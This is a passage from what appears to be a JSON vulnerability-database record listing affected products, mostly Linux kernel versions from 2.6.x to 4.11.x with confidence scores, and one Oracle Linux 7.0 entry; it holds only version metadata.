        "vendor": "linux",
        "version": "4.9.x"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "4.9.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "4.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.0-57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.87"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.90"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.71"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.70"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.82"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.93"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14-1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
